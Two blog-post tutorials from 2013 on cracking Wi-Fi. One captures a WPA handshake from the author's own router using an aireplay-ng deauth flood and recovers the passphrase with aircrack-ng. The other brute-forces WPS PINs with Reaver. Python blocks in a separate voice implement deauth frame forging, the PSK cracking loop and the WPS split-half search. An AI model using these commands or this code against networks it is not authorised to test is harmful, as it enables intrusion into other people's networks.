Friday, 5 July 2013

Cracking WPA-PSK

Okay, so today I got my wireless card through. I know I normally do a post every Wednesday, but I decided to get a post up today because of the number of readers I've had (about 1,000 in the last 2 days) and because the wireless card has arrived.

The Target

The target for this wireless security penetration test is my spare Netgear N600 router running DD-WRT firmware. The router supports all the 802.11 standards up to N, on both 2.4 GHz and 5 GHz.

The tools

  • Software
    • Aircrack-ng suite
    • OS: BackBox
  • Hardware
    • ThinkPad X201t (i7 + 8 GB RAM)
    • Atheros AR9271 wireless card
    • Client: HTC One XL


The test

First off, we need a monitor-mode interface. Luckily, airmon-ng (part of the aircrack-ng suite) can create a virtual monitor-mode interface on top of our managed wlan0 interface.

If you can't make out the screenshot, I ran the command
airmon-ng start wlan0

This provided us with our monitor interface, mon0.

Next we need to check that our wireless network is in range, so run
airodump-ng mon0

This should produce a screen similar to the one below.

Before we proceed, I'm going to briefly explain the screen above. You should see two dynamic tables (tables whose values are not static and keep updating). The top table lists all the access points in range; this is our main table for now. The bottom table lists all the devices talking to access points and which access point each one is talking to. To keep it brief, the three columns in the top table we are interested in are BSSID, ENC and CH: the MAC address of the access point, the encryption in use and the channel it is operating on.

Our next command builds on the last one, but narrows airodump-ng down to the specific network we are testing so we can easily see which devices are connected to it. The command is formatted as follows:
airodump-ng --bssid {bssid of the router} --channel {channel the router is operating on} {interface}

So for me it was
airodump-ng --bssid 20:4E:7F:A5:2A:DC --channel 1 mon0

This gave me output like the following screenshot.

Now we can see the connected device. The bottom table is now the important one: BSSID is still the router's MAC address, but STATION is the client's MAC address. We should also see the packet counters rising (#Data for the access point in the top table, Frames for the client in the bottom one); that shows we are receiving traffic from both devices.
Quickly, before we continue, re-run the airodump-ng command with the -w option before the interface, and after -w put the name of the file you wish to save to. airodump-ng appends a sequence number to that prefix, so -w blogcap writes blogcap-01.cap.
Now we can really begin. Remember in the post about WPA we talked a lot about the handshake; now we are going to grab it. The only problem is that the connection between client and AP is already established, so we need to force the client to reconnect. Since we are working in our own environment we could do it manually, but my phone is on the other side of the room and I'm a lazy person, so we will use another part of the aircrack-ng suite, aireplay-ng.
aireplay-ng needs only a couple of parameters for this operation. First, -0 (this is the digit zero, not the letter O): this tells the program we are going to de-authenticate clients from the access point. Next comes the number of de-authentication rounds to send. I chose 100 as I can stop it when I begin to get results, which I did. Next we need the MAC address of the access point, given with -a, and then the MAC address of the client, given with -c. Finally we need the interface. Just to make it clear, here's the template:
aireplay-ng -0 {number of rounds to send} -a {AP MAC address} -c {client MAC address} {interface}

Which for me became
aireplay-ng -0 100 -a 20:4E:7F:A5:2A:DC -c E8:99:C4:A1:8E:7E mon0
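To make concrete what aireplay-ng -0 actually puts on the air, here is an added example (mine, not the post's or aircrack-ng's code) that builds the 802.11 deauthentication frame the attack relies on, parses it back, and then runs a small detector over a constructed capture to flag the flood pattern a defender would see. The AP and client MACs are the ones from the post; the reason code 7, the sequence numbers and the constructed capture are assumptions for the demo.

```python
import struct
from collections import Counter

# 802.11 frame-control byte: subtype in bits 4-7, type in bits 2-3, version in 0-1.
# Management frame (type 0), subtype 12 = deauthentication -> 0xC0.
FC_DEAUTH = (12 << 4) | (0 << 2) | 0
REASON_CLASS3_NONASSOC = 7  # reason code chosen for this example

AP = "20:4E:7F:A5:2A:DC"      # BSSID from the post
CLIENT = "E8:99:C4:A1:8E:7E"  # station from the post


def mac_bytes(mac: str) -> bytes:
    """'20:4E:7F:A5:2A:DC' -> six raw bytes."""
    parts = mac.split(":")
    if len(parts) != 6:
        raise ValueError(f"bad MAC: {mac}")
    return bytes(int(p, 16) for p in parts)


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02X}" for b in raw)


def build_deauth(dst: str, src: str, bssid: str, seq: int = 0,
                 reason: int = REASON_CLASS3_NONASSOC) -> bytes:
    """Deauthentication frame without FCS (the driver appends it):
    FC(2) duration(2) addr1(6) addr2(6) addr3(6) seqctl(2) | reason code(2)."""
    header = struct.pack("<HH6s6s6sH", FC_DEAUTH, 0,
                         mac_bytes(dst), mac_bytes(src), mac_bytes(bssid),
                         (seq & 0xFFF) << 4)
    return header + struct.pack("<H", reason)


def parse_deauth(frame: bytes):
    """Return (dst, src, bssid, reason) for a deauth frame, else None."""
    if len(frame) < 26:
        return None
    fc, _dur, a1, a2, a3, _seq = struct.unpack_from("<HH6s6s6sH", frame, 0)
    if (fc & 0xFF) != FC_DEAUTH:        # low byte = version/type/subtype
        return None
    reason, = struct.unpack_from("<H", frame, 24)
    return mac_str(a1), mac_str(a2), mac_str(a3), reason


def deauth_flood_report(frames, threshold: int):
    """Defender's view: count deauth frames per (bssid, target) and flag any
    pair at or above the threshold. A legitimate network sends a handful;
    aireplay-ng -0 sends bursts in both directions."""
    counts = Counter()
    for f in frames:
        parsed = parse_deauth(f)
        if parsed:
            dst, _src, bssid, _reason = parsed
            counts[(bssid, dst)] += 1
    return {pair: n for pair, n in counts.items() if n >= threshold}


def sample_capture():
    """Constructed capture: one aireplay-style burst (AP->client and spoofed
    client->AP deauths) plus a beacon-subtype frame that must be ignored."""
    frames = []
    for i in range(64):
        frames.append(build_deauth(CLIENT, AP, AP, seq=i))   # tells the client to leave
        frames.append(build_deauth(AP, CLIENT, AP, seq=i))   # tells the AP the client left
    beacon_fc = 8 << 4
    frames.append(struct.pack("<HH6s6s6sH", beacon_fc, 0, mac_bytes("FF:FF:FF:FF:FF:FF"),
                              mac_bytes(AP), mac_bytes(AP), 0) + bytes(12))
    return frames


if __name__ == "__main__":
    print(parse_deauth(build_deauth(CLIENT, AP, AP)))
    print(deauth_flood_report(sample_capture(), threshold=10))
```

The detector is the part that goes beyond the post: the same frame layout that lets aireplay-ng knock a client off also makes the attack easy to spot in a capture, because nothing legitimate sends dozens of deauths per second to one station. 802.11w (management frame protection) is the fix on the network side; without it, any station can forge these frames.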


In the screen above, at the end of the top line, airodump-ng prints "WPA handshake:" followed by the BSSID. That should be on your screen as well if you have succeeded.
Now let's list the files we captured, just to check they are there.

Now to crack it and recover the password. If you want to know how this process works, refer to my earlier post on the WPA encryption algorithms.
For this we use the final part of the aircrack-ng suite for today, aircrack-ng itself. aircrack-ng is the cracking engine: it picks the EAPOL frames of the four-way handshake out of the capture, extracts the MIC, ANonce and SNonce, derives the key for each candidate passphrase in the wordlist and checks whether it reproduces the captured MIC. It handles both WPA/WPA2-PSK (-a 2) and WEP (-a 1). The basic form of the command is
aircrack-ng -a 2 -w {wordlist file} {your .cap file}

Mine was:
aircrack-ng -a 2 -w /home/spectr3/Desktop/wordlists/rockyoualtered.txt blogcap.cap

I had inserted the password into this wordlist on line 440. aircrack-ng took less than a second to reach the password, test it and report it as correct, giving me this screen:

As you can see the password was "Haxx4Lulz".
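What aircrack-ng did in that second is, per candidate: passphrase and SSID into PBKDF2 to get the PMK, PMK plus both MACs and both nonces into the 802.11i PRF to get the PTK, take its first 16 bytes as the KCK, recompute the MIC over message 2 of the handshake and compare. The added example below (my code, not aircrack-ng's) implements exactly that chain and runs it against a constructed handshake signed with the post's password "Haxx4Lulz". The MACs are the ones from the post; the SSID "spectr3-lab", the nonces, the EAPOL key-info value and the five-word list are assumptions for the demo, and the PBKDF2 step is checked against the IEEE 802.11i published test vector.

```python
import hashlib
import hmac
import struct

# Offset of the 16-byte MIC inside an EAPOL-Key frame:
# EAPOL header (4) + descriptor type (1) + key info (2) + key length (2)
# + replay counter (8) + key nonce (32) + key IV (16) + key RSC (8) + key ID (8) = 81
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK (the PSK) = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)).
    The first 16 bytes of the PTK are the KCK, which signs the handshake."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed. The key descriptor
    version (low 3 bits of key info) picks the algorithm: 1 = HMAC-MD5 (WPA/TKIP),
    2 = HMAC-SHA1 truncated to 16 bytes (WPA2/CCMP)."""
    key_info = struct.unpack_from(">H", frame, 5)[0]
    version = key_info & 0x7
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if version == 2:
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
    raise ValueError(f"unsupported key descriptor version {version}")


def build_eapol_msg2(snonce: bytes, key_info: int = 0x010A) -> bytes:
    """Message 2 of the four-way handshake (client -> AP) with an empty MIC.
    key_info 0x010A = descriptor version 2, pairwise key, MIC present (assumed)."""
    body = struct.pack(">BHHQ", 2, key_info, 0, 1)      # RSN descriptor, key info, key len, replay ctr
    body += snonce + bytes(16) + bytes(8) + bytes(8)    # SNonce, key IV, key RSC, key ID
    body += bytes(16)                                   # MIC, filled in by sign_msg2
    body += struct.pack(">H", 0)                        # key data length 0
    return struct.pack(">BBH", 2, 3, len(body)) + body  # EAPOL v2, packet type 3 = Key


def sign_msg2(frame: bytes, kck: bytes) -> bytes:
    mic = eapol_mic(kck, frame)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]


def crack_psk(ssid, aa, spa, anonce, snonce, eapol_frame, wordlist):
    """The aircrack-ng -a 2 loop: candidate -> PMK -> PTK -> KCK -> MIC, compare.
    Returns (passphrase, candidates_tested) or (None, candidates_tested)."""
    captured_mic = eapol_frame[MIC_OFFSET:MIC_OFFSET + 16]
    for n, candidate in enumerate(wordlist, 1):
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = ptk_from_pmk(pmk, aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame), captured_mic):
            return candidate, n
    return None, len(wordlist)


# Constructed handshake for the demo (not a real capture).
AP_MAC = bytes.fromhex("204E7FA52ADC")       # BSSID from the post
CLIENT_MAC = bytes.fromhex("E899C4A18E7E")   # station from the post
SSID = "spectr3-lab"                         # assumed
ANONCE = hashlib.sha256(b"anonce for demo").digest()   # assumed
SNONCE = hashlib.sha256(b"snonce for demo").digest()   # assumed
PASSPHRASE = "Haxx4Lulz"                     # the password from the post
WORDLIST = ["password", "123456789", "letmein", "Haxx4Lulz", "qwertyuiop"]  # constructed


def captured_msg2() -> bytes:
    """What the client would have sent: message 2 signed with the real KCK."""
    kck = ptk_from_pmk(pmk_from_passphrase(PASSPHRASE, SSID),
                       AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    return sign_msg2(build_eapol_msg2(SNONCE), kck)


def demo(wordlist=WORDLIST):
    return crack_psk(SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE, captured_msg2(), wordlist)


if __name__ == "__main__":
    print(demo())
```

Two things this makes visible that the command line hides: the SSID is the PBKDF2 salt, so a rainbow table is only ever per-SSID (that is why aircrack-ng needs the ESSID from the capture or -e), and the 4096 iterations are the whole cost of the attack, which is why GPU crackers and a good wordlist matter far more than anything in the capture step.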

Hopefully you have enjoyed this week's session. If you want to message me, my email is martyncprice@gmail.com (there is also a PayPal account linked to it if anyone wants to donate towards some 802.11ac equipment, so I can test whether beamforming has any effect on cracking WPA networks).
Hope to see you all again on Wednesday.
-Spectr3

Wednesday, 3 July 2013

WPS

Hey all, I know I'm taking ages with this wireless card, but it turns out I had it sent to my old residence on the other side of Britain. So while I sort that out, I thought I would talk about WPS (Wi-Fi Simple Config, or Wi-Fi Protected Setup).

What is it?

A secure WPA/WPA2 passphrase is a random sequence of letters and digits, not a word (a dictionary attack recovers a word). As you can imagine this is hard to remember: try remembering 3F4KJ5R7 for the next few days and you will have forgotten it by the end of the week unless you have an eidetic memory (and even that example is short; WPA allows up to 63 characters). To keep the story short, a bright spark came up with WPS.

For those of you who are unaware of what WPS is: it's a feature in some routers whereby, to connect, you just type into the computer an 8-digit PIN printed on the router. There is a massive flaw in this: part-way through the exchange the router reveals whether the first 4 digits are correct, so the attacker can search the two halves independently, which cuts the time to find the PIN substantially. If you had to search all 8 digits there are 10^8 possibilities, roughly 6.3 years at a couple of seconds per attempt. Searching the halves separately, and because the eighth digit is a checksum of the other seven, there are at most 10^4 + 10^3 = 11,000 attempts, which brings it down to about a day (commonly more like 6-10 hours in practice). Some routers implement an optional lockdown that stops accepting WPS PINs for 60 seconds after every 3 failed attempts; it slows the attack but does not stop it, and not all routers have it.

How to break it

This is purely for educational purposes. I personally believe in the freedom of educational knowledge, and if you know something you should share it. I do not encourage breaking into someone else's router; if you do, more fool you, it's illegal, and if you are caught you will be locked up. Yes, you can tell your friends you were "hacking", but this is not true hacking: there is no programming involved, no clever tricks, just logic.

Anyway, now that I have covered myself against stupid people doing illegal things and getting caught, we shall proceed to breaking it. I've already told you how it can be broken, and I'm going to go over it very quickly, but first a few tools; if you know them, feel free to skip ahead.

Aircrack-ng suite

The aircrack-ng suite is a wireless "hacker's" best friend; it has almost everything we need for this attack, and I would advise getting a Linux distribution that ships it pre-installed. My personal recommendation differs from the norm. It used to be BackTrack (now Kali), but as BT5r3 was based on Ubuntu 10.04 LTS it can be unstable if you play about too much, so I personally recommend BackBox. I find this distribution clean and enjoyable to use; it's based on Ubuntu 12.04 LTS (Xubuntu, to be exact, as it uses Xfce).

Reaver

The last tool is Reaver. This is the main tool we will be using. To install it, open a terminal and type
apt-get install reaver
This will install Reaver for you. If you get a permissions error, try
sudo apt-get install reaver
and type in your password (sudo runs the command as root, roughly like "run as administrator" on Windows).
Once we have both of these installed, we are ready.

Lets get attacking

All of the following happens in the terminal, so put away your GUI; it's CLI time :D
First of all we need to bring up a monitor-mode interface, so run
iwconfig
You should see your wireless card listed as wlan0.
Next type
airmon-ng start wlan0
This puts your wireless card into monitor mode (there are seven wireless modes; for more info check my first post about wireless). The monitor mode should appear as a new interface called mon0; run iwconfig again if you want to check it's there.
Now type
airodump-ng mon0
This starts a program that displays all the wireless networks in range in the top area and, in the bottom area, all the visible connections between clients and access points.
When you can see the wireless network you want to attack, press ctrl+c to stop the program. You should now have at least one wireless network on your screen; this is the one you are going to attack, so copy its MAC address, which looks like XX:XX:XX:XX:XX:XX (note: ctrl+c and ctrl+x are reserved for other things in a terminal, so use ctrl+shift+c or right click > copy instead).
Hopefully you now have the MAC address to attack in your clipboard (the place your computer stores copied text). One check worth doing first: airodump-ng does not show whether WPS is enabled, but wash, which ships with Reaver, does (wash -i mon0), and Reaver can only attack an access point that has WPS turned on and not locked.
Final step, the actual attack using Reaver.
Reaver needs two arguments for this: the interface (-i mon0) and the MAC address of the access point to attack (-b). Add -vv if you want to watch each PIN attempt. To execute, type the following, substituting where appropriate:
reaver -i mon0 -b <MAC address here>
And that's the entire command. Now just sit back and wait.
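To show why the numbers in the "What is it?" section come out the way they do, and what Reaver is doing while you sit back and wait, here is an added example (my code, not Reaver's) that models the WPS registrar as an oracle which, like the real one, NACKs after M4 when the first half of the PIN is wrong and after M6 when the second half is wrong, then runs the split search against it and counts attempts. The checksum formula is the one the eighth PIN digit is defined by; the secret PINs, the per-attempt timing and the lockout parameters are assumptions for the demo.

```python
def wps_checksum(first_seven: int) -> int:
    """The eighth WPS PIN digit is a checksum over the first seven, so only
    10^7 of the 10^8 eight-digit strings are valid PINs."""
    acc = 0
    n = first_seven
    while n:
        acc += 3 * (n % 10)
        n //= 10
        acc += n % 10
        n //= 10
    return (10 - acc % 10) % 10


class MockRegistrar:
    """Stand-in for the router's WPS registrar (assumed secret PIN). The real
    protocol leaks the same information: a NACK after M4 if the first four
    digits are wrong, a NACK after M6 if the last four are wrong, otherwise M7."""

    def __init__(self, pin: str):
        self.first, self.second = pin[:4], pin[4:]
        self.attempts = 0

    def try_pin(self, pin: str) -> str:
        self.attempts += 1
        if pin[:4] != self.first:
            return "NACK after M4"
        if pin[4:] != self.second:
            return "NACK after M6"
        return "M7: PIN accepted"


def reaver_style_search(ap: MockRegistrar):
    """Search the halves independently: up to 10^4 tries for the first half,
    then up to 10^3 for the second, whose last digit is fixed by the checksum."""
    for p1 in range(10_000):
        reply = ap.try_pin(f"{p1:04d}0000")          # any second half will do here
        if reply == "M7: PIN accepted":
            return f"{p1:04d}0000"
        if reply == "NACK after M6":                  # first half confirmed
            break
    else:
        return None
    for p2 in range(1_000):
        pin = f"{p1:04d}{p2:03d}{wps_checksum(p1 * 1000 + p2)}"
        if ap.try_pin(pin) == "M7: PIN accepted":
            return pin
    return None


def naive_search_size() -> int:
    """Attempts if the registrar leaked nothing and the checksum were unknown."""
    return 10 ** 8


def estimate_seconds(attempts: int, seconds_per_attempt: float = 2.0,
                     lockout_every: int = 3, lockout_seconds: int = 60) -> float:
    """Wall-clock estimate: per-attempt cost plus the optional lockdown the post
    describes (60 s after every 3 failures) where the AP implements it."""
    lockouts = attempts // lockout_every if lockout_every else 0
    return attempts * seconds_per_attempt + lockouts * lockout_seconds


if __name__ == "__main__":
    ap = MockRegistrar("12345670")        # assumed secret; Reaver's well-known first guess
    print(reaver_style_search(ap), ap.attempts, "attempts")
    print("no lockout, worst case:", estimate_seconds(11_000, lockout_every=0) / 3600, "hours")
    print("with lockout, worst case:", estimate_seconds(11_000) / 3600, "hours")
    print("naive:", estimate_seconds(naive_search_size(), lockout_every=0) / 31_557_600, "years")
```

The search is worst-case 11,000 attempts whatever the PIN, which is the whole gap between "years" and "hours". The lockout only multiplies the per-attempt cost; the real fix on the router side is to disable WPS PIN entry entirely.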

Hopefully this is enough for today. I'll be back next week (hopefully with the wireless card issue resolved).
-Spectr3